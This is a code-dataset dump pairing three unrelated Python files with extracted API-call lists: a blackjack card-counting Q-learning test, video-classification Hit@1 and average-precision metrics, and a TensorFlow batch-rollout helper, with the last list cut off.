'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Transmission"""'], {'fontsize': '(14)'}), "('Transmission', fontsize=14)\n", (2284, 2313), True, 'import matplotlib.pyplot as plt\n'), ((2325, 2345), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0.0, 1.3]'], {}), '([0.0, 1.3])\n', (2333, 2345), True, 'import matplotlib.pyplot as plt\n'), ((2356, 2421), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'frameon': '(0)', 'ncol': '(2)', 'labelspacing': '(0.1)', 'loc': '"""upper left"""'}), "(frameon=0, ncol=2, labelspacing=0.1, loc='upper left')\n", (2366, 2421), True, 'import matplotlib.pyplot as plt\n'), ((2431, 2448), 'matplotlib.pyplot.xscale', 'plt.xscale', (['"""log"""'], {}), "('log')\n", (2441, 2448), True, 'import matplotlib.pyplot as plt\n'), ((2461, 2500), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_inches': '"""tight"""'}), "(fname, bbox_inches='tight')\n", (2472, 2500), True, 'import matplotlib.pyplot as plt\n'), ((2512, 2523), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (2521, 2523), True, 'import matplotlib.pyplot as plt\n'), ((3277, 3322), 'dominate.tags.h2', 'dtg.h2', (['"""Coadded power spectra"""'], {'id': '"""coadded"""'}), "('Coadded power spectra', id='coadded')\n", (3283, 3322), True, 'import dominate.tags as dtg\n'), ((3338, 3346), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (3344, 3346), True, 'import dominate.tags as dtg\n'), ((6560, 6592), 'dominate.tags.h2', 'dtg.h2', (['"""Null tests"""'], {'id': '"""nulls"""'}), "('Null tests', id='nulls')\n", (6566, 6592), True, 'import dominate.tags as dtg\n'), ((6608, 6616), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (6614, 6616), True, 'import dominate.tags as dtg\n'), ((7989, 8020), 'dominate.tags.h2', 'dtg.h2', (['"""Likelihood"""'], {'id': '"""like"""'}), "('Likelihood', id='like')\n", (7995, 8020), True, 'import dominate.tags as dtg\n'), ((8036, 8044), 'dominate.tags.ul', 'dtg.ul', ([], {}), '()\n', (8042, 8044), True, 'import dominate.tags as dtg\n'), ((9010, 9070), 'numpy.array', 'np.array', (["[(n in names_common) for n in self.chain['names']]"], {}), "([(n in names_common) for n in self.chain['names']])\n", (9018, 9070), True, 'import numpy as np\n'), ((9367, 9457), 'getdist.MCSamples', 'MCSamples', ([], {'samples': 'chain', 'names': 'names_common', 'labels': '[labdir[n] for n in names_common]'}), '(samples=chain, names=names_common, labels=[labdir[n] for n in\n names_common])\n', (9376, 9457), False, 'from getdist import MCSamples\n'), ((9530, 9556), 'getdist.plots.getSubplotPlotter', 'gplots.getSubplotPlotter', ([], {}), '()\n', (9554, 9556), True, 'from getdist import plots as gplots\n'), ((1298, 1337), 'dominate.tags.a', 'dtg.a', (['"""Bandpasses"""'], {'href': '"""#bandpasses"""'}), "('Bandpasses', href='#bandpasses')\n", (1303, 1337), True, 'import dominate.tags as dtg\n'), ((1362, 1409), 'dominate.tags.a', 'dtg.a', (['"""Coadded power spectra"""'], {'href': '"""#coadded"""'}), "('Coadded power spectra', href='#coadded')\n", (1367, 1409), True, 'import dominate.tags as dtg\n'), ((2548, 2572), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (2553, 2572), True, 'import dominate.tags as dtg\n'), ((2744, 2756), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (2754, 2756), True, 'import matplotlib.pyplot as plt\n'), ((2773, 2802), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(14)'}), '(title, fontsize=14)\n', (2782, 2802), True, 'import matplotlib.pyplot as plt\n'), ((2880, 2928), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\nu\\\\,[{\\\\rm GHz}]$"""'], {'fontsize': '(14)'}), "('$\\\\nu\\\\,[{\\\\rm GHz}]$', fontsize=14)\n", (2890, 2928), True, 'import matplotlib.pyplot as plt\n'), ((2944, 2983), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Transmission"""'], {'fontsize': '(14)'}), "('Transmission', fontsize=14)\n", (2954, 2983), True, 'import matplotlib.pyplot as plt\n'), ((2999, 3020), 'matplotlib.pyplot.ylim', 'plt.ylim', (['[0.0, 1.05]'], {}), '([0.0, 1.05])\n', (3007, 3020), True, 'import matplotlib.pyplot as plt\n'), ((3035, 3074), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_inches': '"""tight"""'}), "(fname, bbox_inches='tight')\n", (3046, 3074), True, 'import matplotlib.pyplot as plt\n'), ((3090, 3101), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (3099, 3101), True, 'import matplotlib.pyplot as plt\n'), ((3175, 3213), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (3180, 3213), True, 'import dominate.tags as dtg\n'), ((6444, 6482), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (6449, 6482), True, 'import dominate.tags as dtg\n'), ((6901, 6913), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (6911, 6913), True, 'import matplotlib.pyplot as plt\n'), ((6930, 6959), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(15)'}), '(title, fontsize=15)\n', (6939, 6959), True, 'import matplotlib.pyplot as plt\n'), ((7518, 7552), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\ell$"""'], {'fontsize': '(15)'}), "('$\\\\ell$', fontsize=15)\n", (7528, 7552), True, 'import matplotlib.pyplot as plt\n'), ((7568, 7618), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$C_\\\\ell/\\\\sigma_\\\\ell$"""'], {'fontsize': '(15)'}), "('$C_\\\\ell/\\\\sigma_\\\\ell$', fontsize=15)\n", (7578, 7618), True, 'import matplotlib.pyplot as plt\n'), ((7634, 7646), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (7644, 7646), True, 'import matplotlib.pyplot as plt\n'), ((7663, 7701), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_index': '"""tight"""'}), "(fname, bbox_index='tight')\n", (7674, 7701), True, 'import matplotlib.pyplot as plt\n'), ((7717, 7728), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (7726, 7728), True, 'import matplotlib.pyplot as plt\n'), ((7803, 7841), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (7808, 7841), True, 'import dominate.tags as dtg\n'), ((9282, 9311), 'numpy.array', 'np.array', (["self.chain['names']"], {}), "(self.chain['names'])\n", (9290, 9311), True, 'import numpy as np\n'), ((10012, 10052), 'dominate.tags.a', 'dtg.a', (['"""Likelihood contours"""'], {'href': 'fname'}), "('Likelihood contours', href=fname)\n", (10017, 10052), True, 'import dominate.tags as dtg\n'), ((10074, 10112), 'dominate.tags.a', 'dtg.a', (['"""Back to TOC"""'], {'href': '"""#contents"""'}), "('Back to TOC', href='#contents')\n", (10079, 10112), True, 'import dominate.tags as dtg\n'), ((1480, 1514), 'dominate.tags.a', 'dtg.a', (['"""Null tests"""'], {'href': '"""#nulls"""'}), "('Null tests', href='#nulls')\n", (1485, 1514), True, 'import dominate.tags as dtg\n'), ((1590, 1623), 'dominate.tags.a', 'dtg.a', (['"""Likelihood"""'], {'href': '"""#like"""'}), "('Likelihood', href='#like')\n", (1595, 1623), True, 'import dominate.tags as dtg\n'), ((2024, 2054), 'numpy.sum', 'np.sum', (['(t.bandpass * t.nu ** 3)'], {}), '(t.bandpass * t.nu ** 3)\n', (2030, 2054), True, 'import numpy as np\n'), ((2051, 2081), 'numpy.sum', 'np.sum', (['(t.bandpass * t.nu ** 2)'], {}), '(t.bandpass * t.nu ** 2)\n', (2057, 2081), True, 'import numpy as np\n'), ((3130, 3154), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (3135, 3154), True, 'import dominate.tags as dtg\n'), ((7757, 7781), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (7762, 7781), True, 'import dominate.tags as dtg\n'), ((2119, 2138), 'numpy.amax', 'np.amax', (['t.bandpass'], {}), '(t.bandpass)\n', (2126, 2138), True, 'import numpy as np\n'), ((2843, 2862), 'numpy.amax', 'np.amax', (['t.bandpass'], {}), '(t.bandpass)\n', (2850, 2862), True, 'import numpy as np\n'), ((4099, 4111), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (4109, 4111), True, 'import matplotlib.pyplot as plt\n'), ((4136, 4165), 'matplotlib.pyplot.title', 'plt.title', (['title'], {'fontsize': '(14)'}), '(title, fontsize=14)\n', (4145, 4165), True, 'import matplotlib.pyplot as plt\n'), ((4257, 4330), 'matplotlib.pyplot.plot', 'plt.plot', (['l[l < self.lmx]', 'cl[l < self.lmx]', '"""k-"""'], {'label': '"""Fiducial model"""'}), "(l[l < self.lmx], cl[l < self.lmx], 'k-', label='Fiducial model')\n", (4265, 4330), True, 'import matplotlib.pyplot as plt\n'), ((5659, 5728), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['l[msk]', 'cl[msk]'], {'yerr': 'el', 'fmt': '"""bo"""', 'label': '"""Cross-coadd"""'}), "(l[msk], cl[msk], yerr=el, fmt='bo', label='Cross-coadd')\n", (5671, 5728), True, 'import matplotlib.pyplot as plt\n'), ((5793, 5859), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['(l[msk] + 1)', '(-cl[msk])'], {'yerr': 'el', 'fmt': '"""bo"""', 'mfc': '"""white"""'}), "(l[msk] + 1, -cl[msk], yerr=el, fmt='bo', mfc='white')\n", (5805, 5859), True, 'import matplotlib.pyplot as plt\n'), ((5936, 5953), 'matplotlib.pyplot.yscale', 'plt.yscale', (['"""log"""'], {}), "('log')\n", (5946, 5953), True, 'import matplotlib.pyplot as plt\n'), ((5978, 6012), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\ell$"""'], {'fontsize': '(15)'}), "('$\\\\ell$', fontsize=15)\n", (5988, 6012), True, 'import matplotlib.pyplot as plt\n'), ((6250, 6262), 'matplotlib.pyplot.legend', 'plt.legend', ([], {}), '()\n', (6260, 6262), True, 'import matplotlib.pyplot as plt\n'), ((6287, 6326), 'matplotlib.pyplot.savefig', 'plt.savefig', (['fname'], {'bbox_inches': '"""tight"""'}), "(fname, bbox_inches='tight')\n", (6298, 6326), True, 'import matplotlib.pyplot as plt\n'), ((6350, 6361), 'matplotlib.pyplot.close', 'plt.close', ([], {}), '()\n', (6359, 6361), True, 'import matplotlib.pyplot as plt\n'), ((4625, 4694), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['l[msk]', 'cl[msk]'], {'yerr': 'el', 'fmt': '"""ro"""', 'label': '"""Total coadd"""'}), "(l[msk], cl[msk], yerr=el, fmt='ro', label='Total coadd')\n", (4637, 4694), True, 'import matplotlib.pyplot as plt\n'), ((4767, 4833), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['(l[msk] + 1)', '(-cl[msk])'], {'yerr': 'el', 'fmt': '"""ro"""', 'mfc': '"""white"""'}), "(l[msk] + 1, -cl[msk], yerr=el, fmt='ro', mfc='white')\n", (4779, 4833), True, 'import matplotlib.pyplot as plt\n'), ((5180, 5243), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['l[msk]', 'cl[msk]'], {'yerr': 'el', 'fmt': '"""yo"""', 'label': '"""Noise"""'}), "(l[msk], cl[msk], yerr=el, fmt='yo', label='Noise')\n", (5192, 5243), True, 'import matplotlib.pyplot as plt\n'), ((5316, 5382), 'matplotlib.pyplot.errorbar', 'plt.errorbar', (['(l[msk] + 1)', '(-cl[msk])'], {'yerr': 'el', 'fmt': '"""yo"""', 'mfc': '"""white"""'}), "(l[msk] + 1, -cl[msk], yerr=el, fmt='yo', mfc='white')\n", (5328, 5382), True, 'import matplotlib.pyplot as plt\n'), ((6096, 6132), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$D_\\\\ell$"""'], {'fontsize': '(15)'}), "('$D_\\\\ell$', fontsize=15)\n", (6106, 6132), True, 'import matplotlib.pyplot as plt\n'), ((6190, 6226), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$C_\\\\ell$"""'], {'fontsize': '(15)'}), "('$C_\\\\ell$', fontsize=15)\n", (6200, 6226), True, 'import matplotlib.pyplot as plt\n'), ((6398, 6422), 'dominate.tags.a', 'dtg.a', (['title'], {'href': 'fname'}), '(title, href=fname)\n', (6403, 6422), True, 'import dominate.tags as dtg\n'), ((7412, 7428), 'numpy.ones_like', 'np.ones_like', (['el'], {}), '(el)\n', (7424, 7428), True, 'import numpy as np\n'), ((5615, 5627), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (5622, 5627), True, 'import numpy as np\n'), ((7294, 7305), 'numpy.diag', 'np.diag', (['cv'], {}), '(cv)\n', (7301, 7305), True, 'import numpy as np\n'), ((4577, 4589), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (4584, 4589), True, 'import numpy as np\n'), ((5132, 5144), 'numpy.diag', 'np.diag', (['cov'], {}), '(cov)\n', (5139, 5144), True, 'import numpy as np\n')]
# Finite Decks, Aces = reactive # this program just uses the count information to maximize score. import numpy as np import matplotlib.pyplot as plt import random from rl_tools import ( simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate, ) e = 0.1 nodecks = 6 def learning(e, nodecks): Qtable = np.zeros( (34, 2, 5) ) # columns for twitsing and sticking. Extra dimension for divisions of count. # divisions of count will be c<-10, -10<=c<-3, -3<=c<=3, 3<c<=10, c>10 Instances = np.zeros((34, 2, 5)) # columns for twitsing and sticking. for n in range(1000): drawpile = initializedrawpile(nodecks) while any(drawpile != 0): Qtable, Instances, drawpile = simulation(Qtable, Instances, drawpile, e) fig = plt.figure() ax1 = fig.add_subplot(211) ax1.plot(range(34), np.sum(Qtable[:, 1, :], axis=1)) ax1.plot(range(34), np.sum(Qtable[:, 0, :], axis=1), color="red") ax1.legend(["Twist", "Fold"]) ax1.set_ylabel("Average Score") ax1.set_xlabel("Hand value") ax1.set(xlim=(-1, 22), ylim=(0, max(np.sum(Qtable[:, 0, :], axis=1)) * 1.1)) plt.xticks(np.arange(0, 22, 1)) plt.show() testscore = test(Qtable, nodecks) return Qtable, testscore # function to test the results of the Qtable on unseen data. No exploration. def test(Qtable, nodecks): testscore = np.asarray([]) drawpile = initializedrawpile(nodecks) while any(drawpile != 0): # recieve first card card, drawpile = twist(drawpile) truecount = countcalc(drawpile) cardsinhand = np.array([0, card]) newaction = np.argmax(Qtable[sum(cardsinhand), :, truecount]) # while they havent folded or gone bust while ( newaction == 1 and (sum(cardsinhand) < 22 or 11 in cardsinhand) and any(drawpile != 0) ): if sum(cardsinhand) > 21: # if over 21 replace 11 with 1 for aces. cardsinhand = acecheck(sum(cardsinhand), cardsinhand) # now we have changed 11 to 1, find new action. newaction = actionupdate(Qtable, sum(cardsinhand), e, truecount) else: card, drawpile = newcard(newaction, drawpile) cardsinhand = np.append(cardsinhand, card) cardsinhand = acecheck(sum(cardsinhand), cardsinhand) truecount = countcalc(drawpile) # determine whether to stick or twist newaction = np.argmax(Qtable[sum(cardsinhand), :, truecount]) score = scorecalc(sum(cardsinhand), len(cardsinhand)) testscore = np.append(testscore, score) return np.mean(testscore)
[ "rl_tools.initializedrawpile", "matplotlib.pyplot.show", "numpy.sum", "rl_tools.twist", "rl_tools.simulation", "numpy.asarray", "numpy.zeros", "rl_tools.countcalc", "numpy.append", "matplotlib.pyplot.figure", "numpy.mean", "numpy.arange", "numpy.array", "rl_tools.newcard" ]
[((432, 452), 'numpy.zeros', 'np.zeros', (['(34, 2, 5)'], {}), '((34, 2, 5))\n', (440, 452), True, 'import numpy as np\n'), ((640, 660), 'numpy.zeros', 'np.zeros', (['(34, 2, 5)'], {}), '((34, 2, 5))\n', (648, 660), True, 'import numpy as np\n'), ((906, 918), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (916, 918), True, 'import matplotlib.pyplot as plt\n'), ((1310, 1320), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1318, 1320), True, 'import matplotlib.pyplot as plt\n'), ((1519, 1533), 'numpy.asarray', 'np.asarray', (['[]'], {}), '([])\n', (1529, 1533), True, 'import numpy as np\n'), ((1550, 1577), 'rl_tools.initializedrawpile', 'initializedrawpile', (['nodecks'], {}), '(nodecks)\n', (1568, 1577), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((2875, 2893), 'numpy.mean', 'np.mean', (['testscore'], {}), '(testscore)\n', (2882, 2893), True, 'import numpy as np\n'), ((746, 773), 'rl_tools.initializedrawpile', 'initializedrawpile', (['nodecks'], {}), '(nodecks)\n', (764, 773), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((976, 1007), 'numpy.sum', 'np.sum', (['Qtable[:, 1, :]'], {'axis': '(1)'}), '(Qtable[:, 1, :], axis=1)\n', (982, 1007), True, 'import numpy as np\n'), ((1034, 1065), 'numpy.sum', 'np.sum', (['Qtable[:, 0, :]'], {'axis': '(1)'}), '(Qtable[:, 0, :], axis=1)\n', (1040, 1065), True, 'import numpy as np\n'), ((1284, 1303), 'numpy.arange', 'np.arange', (['(0)', '(22)', '(1)'], {}), '(0, 22, 1)\n', (1293, 1303), True, 'import numpy as np\n'), ((1665, 1680), 'rl_tools.twist', 'twist', (['drawpile'], {}), '(drawpile)\n', (1670, 1680), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((1702, 1721), 'rl_tools.countcalc', 'countcalc', (['drawpile'], {}), '(drawpile)\n', (1711, 1721), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((1745, 1764), 'numpy.array', 'np.array', (['[0, card]'], {}), '([0, card])\n', (1753, 1764), True, 'import numpy as np\n'), ((2835, 2862), 'numpy.append', 'np.append', (['testscore', 'score'], {}), '(testscore, score)\n', (2844, 2862), True, 'import numpy as np\n'), ((852, 894), 'rl_tools.simulation', 'simulation', (['Qtable', 'Instances', 'drawpile', 'e'], {}), '(Qtable, Instances, drawpile, e)\n', (862, 894), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((2408, 2436), 'rl_tools.newcard', 'newcard', (['newaction', 'drawpile'], {}), '(newaction, drawpile)\n', (2415, 2436), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((2468, 2496), 'numpy.append', 'np.append', (['cardsinhand', 'card'], {}), '(cardsinhand, card)\n', (2477, 2496), True, 'import numpy as np\n'), ((2597, 2616), 'rl_tools.countcalc', 'countcalc', (['drawpile'], {}), '(drawpile)\n', (2606, 2616), False, 'from rl_tools import simulation, scorecalc, countcalc, initializedrawpile, actionupdate, acecheck, cardvalue, newcard, twist, qtableupdate\n'), ((1227, 1258), 'numpy.sum', 'np.sum', (['Qtable[:, 0, :]'], {'axis': '(1)'}), '(Qtable[:, 0, :], axis=1)\n', (1233, 1258), True, 'import numpy as np\n')]
# Copyright (c) 2021 Qualcomm Technologies, Inc. # All Rights Reserved. import numpy as np from ignite.metrics import Metric def softmax(logit): e_x = np.exp(logit - np.max(logit)) return e_x / e_x.sum() def sigmoid(logit): return 1 / (1 + np.exp(-logit)) class Hitat1(Metric): """ Performs a local (numpy) calculation of the hit at one. """ def __init__( self, aggregation="max", output_transform=lambda x: x, activation_fn=None ): self.predictions_dict = {} self.actuals_dict = {} self.aggregation = np.max if aggregation == "max" else np.mean self.apply_activation = ( softmax if activation_fn == "softmax" else sigmoid if activation_fn == "sigmoid" else None ) super(Hitat1, self).__init__(output_transform=output_transform, device=None) def reset(self): self.predictions_dict = {} self.actuals_dict = {} def update(self, output, masks=None): """ Parameters ---------- # predictions is n * num_class numpy array of predictions where n is number of samples # actuals is n * num_class numpy array of multihot labels where n is number of samples """ predictions, actuals, ids = output for i, key in enumerate(ids): if key in self.predictions_dict: self.predictions_dict[key].append(predictions[i]) self.actuals_dict[key].append(actuals[i]) else: self.predictions_dict[key] = [predictions[i]] self.actuals_dict[key] = [actuals[i]] def compute(self): preds, acts, keys = [], [], [] for key in self.predictions_dict.keys(): pred_video = self.aggregation( np.stack(self.predictions_dict[key]), axis=0 ).squeeze() if self.apply_activation: pred_video = self.apply_activation(pred_video) preds.append(pred_video) acts.append(np.stack(self.actuals_dict[key]).max(axis=0).squeeze()) keys.append(key) preds = np.stack(preds) acts = np.stack(acts) non_negative = np.any(acts, axis=1) acts = acts[non_negative] preds = preds[non_negative] top_prediction = np.argmax(preds, 1) hits = acts[np.arange(acts.shape[0]), top_prediction] return np.average(hits) class AveragePrecision(Metric): # compute metrics based on video ids def __init__( self, num_class=1000, top_n=None, aggregation="max", filter_empty_classes=False, output_transform=lambda x: x, activation_fn=None, ): super(AveragePrecision, self).__init__( output_transform=output_transform, device=None ) self.num_class = num_class self.top_n = top_n self.filter_empty_classes = filter_empty_classes self.predictions = [[] for _ in range(num_class)] self.actuals = [[] for _ in range(num_class)] self.predictions_dict = {} self.actuals_dict = {} self.aggregation = np.max if aggregation == "max" else np.mean self.apply_activation = ( softmax if activation_fn == "softmax" else sigmoid if activation_fn == "sigmoid" else None ) def reset(self): self.predictions_dict = {} self.actuals_dict = {} def update(self, output): """ Parameters ---------- # predictions is n * num_class numpy array of predictions where n is number of samples # actuals is n * num_class numpy array of multihot labels where n is number of samples """ predictions, actuals, ids = output for i, key in enumerate(ids): if key in self.predictions_dict: self.predictions_dict[key].append(predictions[i]) self.actuals_dict[key].append(actuals[i]) else: self.predictions_dict[key] = [predictions[i]] self.actuals_dict[key] = [actuals[i]] def compute(self): predictions, actuals, keys = self._arrange_predictions_by_class() res = [] for i in range(self.num_class): target = np.concatenate(actuals[i]) output = np.concatenate(predictions[i]) ap_class, num_pos = self.ap(output, target, top_n=self.top_n) if not self.filter_empty_classes or num_pos > 0: res.append(ap_class) return res def _arrange_predictions_by_class(self): preds, acts, keys = [], [], [] for key in self.predictions_dict.keys(): pred_video = self.aggregation( np.stack(self.predictions_dict[key]), axis=0 ).squeeze() if self.apply_activation: pred_video = self.apply_activation(pred_video) preds.append(pred_video) acts.append(np.stack(self.actuals_dict[key]).max(axis=0).squeeze()) keys.append(key) preds = np.stack(preds) acts = np.stack(acts) predictions = [[] for _ in range(self.num_class)] actuals = [[] for _ in range(self.num_class)] for i in range(self.num_class): predictions[i].append(preds[:, i]) actuals[i].append(acts[:, i]) return predictions, actuals, keys @staticmethod def ap(predictions, actuals, top_n=None): num_positive_total = actuals.sum() if num_positive_total == 0: return float("NaN"), 0 sorted_idx = np.argsort(predictions)[::-1] if top_n is not None: sorted_idx = sorted_idx[:top_n] actuals = actuals[sorted_idx] num_pos = actuals.sum() precisions = np.cumsum(actuals) / np.arange(1, len(actuals) + 1) ap = (precisions * actuals).sum() / (float(num_pos) + 1e-15) return ap, num_positive_total
[ "numpy.stack", "numpy.average", "numpy.argmax", "numpy.any", "numpy.argsort", "numpy.max", "numpy.cumsum", "numpy.arange", "numpy.exp", "numpy.concatenate" ]
[((2169, 2184), 'numpy.stack', 'np.stack', (['preds'], {}), '(preds)\n', (2177, 2184), True, 'import numpy as np\n'), ((2200, 2214), 'numpy.stack', 'np.stack', (['acts'], {}), '(acts)\n', (2208, 2214), True, 'import numpy as np\n'), ((2239, 2259), 'numpy.any', 'np.any', (['acts'], {'axis': '(1)'}), '(acts, axis=1)\n', (2245, 2259), True, 'import numpy as np\n'), ((2356, 2375), 'numpy.argmax', 'np.argmax', (['preds', '(1)'], {}), '(preds, 1)\n', (2365, 2375), True, 'import numpy as np\n'), ((2453, 2469), 'numpy.average', 'np.average', (['hits'], {}), '(hits)\n', (2463, 2469), True, 'import numpy as np\n'), ((5166, 5181), 'numpy.stack', 'np.stack', (['preds'], {}), '(preds)\n', (5174, 5181), True, 'import numpy as np\n'), ((5197, 5211), 'numpy.stack', 'np.stack', (['acts'], {}), '(acts)\n', (5205, 5211), True, 'import numpy as np\n'), ((173, 186), 'numpy.max', 'np.max', (['logit'], {}), '(logit)\n', (179, 186), True, 'import numpy as np\n'), ((257, 271), 'numpy.exp', 'np.exp', (['(-logit)'], {}), '(-logit)\n', (263, 271), True, 'import numpy as np\n'), ((4370, 4396), 'numpy.concatenate', 'np.concatenate', (['actuals[i]'], {}), '(actuals[i])\n', (4384, 4396), True, 'import numpy as np\n'), ((4418, 4448), 'numpy.concatenate', 'np.concatenate', (['predictions[i]'], {}), '(predictions[i])\n', (4432, 4448), True, 'import numpy as np\n'), ((5697, 5720), 'numpy.argsort', 'np.argsort', (['predictions'], {}), '(predictions)\n', (5707, 5720), True, 'import numpy as np\n'), ((5893, 5911), 'numpy.cumsum', 'np.cumsum', (['actuals'], {}), '(actuals)\n', (5902, 5911), True, 'import numpy as np\n'), ((2396, 2420), 'numpy.arange', 'np.arange', (['acts.shape[0]'], {}), '(acts.shape[0])\n', (2405, 2420), True, 'import numpy as np\n'), ((1837, 1873), 'numpy.stack', 'np.stack', (['self.predictions_dict[key]'], {}), '(self.predictions_dict[key])\n', (1845, 1873), True, 'import numpy as np\n'), ((4834, 4870), 'numpy.stack', 'np.stack', (['self.predictions_dict[key]'], {}), '(self.predictions_dict[key])\n', (4842, 4870), True, 'import numpy as np\n'), ((2068, 2100), 'numpy.stack', 'np.stack', (['self.actuals_dict[key]'], {}), '(self.actuals_dict[key])\n', (2076, 2100), True, 'import numpy as np\n'), ((5065, 5097), 'numpy.stack', 'np.stack', (['self.actuals_dict[key]'], {}), '(self.actuals_dict[key])\n', (5073, 5097), True, 'import numpy as np\n')]
import numpy as np import tensorflow as tf class BatchRollout: def __init__(self, env, max_episode_steps): self.env = env self.max_episode_steps = max_episode_steps def __call__(self, policy, episodes, render=False): assert len(self.env) == episodes observation_space = self.env.observation_space action_space = self.env.action_space observations = np.zeros( shape=(episodes, self.max_episode_steps) + observation_space.shape, dtype=observation_space.dtype, ) actions = np.zeros( shape=(episodes, self.max_episode_steps) + action_space.shape, dtype=action_space.dtype, ) rewards = np.zeros(shape=(episodes, self.max_episode_steps), dtype=np.float32) weights = np.zeros(shape=(episodes, self.max_episode_steps), dtype=np.float32) batch_size = len(self.env) episode_done = np.zeros(shape=batch_size, dtype=np.bool) observation = self.env.reset() for step in range(self.max_episode_steps): if render: self.env.envs[0].render() observation_tensor = tf.convert_to_tensor(observation, dtype=tf.float32) action_tensor = policy(observation_tensor[:, None, ...], training=False) action = action_tensor[:, 0].numpy() observation_next, reward, done, info = self.env.step(action) observations[:, step] = observation actions[:, step] = action rewards[:, step] = reward weights[:, step] = np.where(episode_done, 0.0, 1.0) # update episode done status episode_done = episode_done | done # end the rollout if all episodes are done if np.all(episode_done): break observation = observation_next # ensure rewards are masked rewards *= weights observations = tf.convert_to_tensor(observations) actions = tf.convert_to_tensor(actions) rewards = tf.convert_to_tensor(rewards) weights = tf.convert_to_tensor(weights) return observations, actions, rewards, weights
[ "tensorflow.convert_to_tensor", "numpy.where", "numpy.zeros", "numpy.all" ]
[((410, 521), 'numpy.zeros', 'np.zeros', ([], {'shape': '((episodes, self.max_episode_steps) + observation_space.shape)', 'dtype': 'observation_space.dtype'}), '(shape=(episodes, self.max_episode_steps) + observation_space.shape,\n dtype=observation_space.dtype)\n', (418, 521), True, 'import numpy as np\n'), ((571, 672), 'numpy.zeros', 'np.zeros', ([], {'shape': '((episodes, self.max_episode_steps) + action_space.shape)', 'dtype': 'action_space.dtype'}), '(shape=(episodes, self.max_episode_steps) + action_space.shape,\n dtype=action_space.dtype)\n', (579, 672), True, 'import numpy as np\n'), ((722, 790), 'numpy.zeros', 'np.zeros', ([], {'shape': '(episodes, self.max_episode_steps)', 'dtype': 'np.float32'}), '(shape=(episodes, self.max_episode_steps), dtype=np.float32)\n', (730, 790), True, 'import numpy as np\n'), ((809, 877), 'numpy.zeros', 'np.zeros', ([], {'shape': '(episodes, self.max_episode_steps)', 'dtype': 'np.float32'}), '(shape=(episodes, self.max_episode_steps), dtype=np.float32)\n', (817, 877), True, 'import numpy as np\n'), ((937, 978), 'numpy.zeros', 'np.zeros', ([], {'shape': 'batch_size', 'dtype': 'np.bool'}), '(shape=batch_size, dtype=np.bool)\n', (945, 978), True, 'import numpy as np\n'), ((1955, 1989), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['observations'], {}), '(observations)\n', (1975, 1989), True, 'import tensorflow as tf\n'), ((2008, 2037), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['actions'], {}), '(actions)\n', (2028, 2037), True, 'import tensorflow as tf\n'), ((2056, 2085), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['rewards'], {}), '(rewards)\n', (2076, 2085), True, 'import tensorflow as tf\n'), ((2104, 2133), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['weights'], {}), '(weights)\n', (2124, 2133), True, 'import tensorflow as tf\n'), ((1170, 1221), 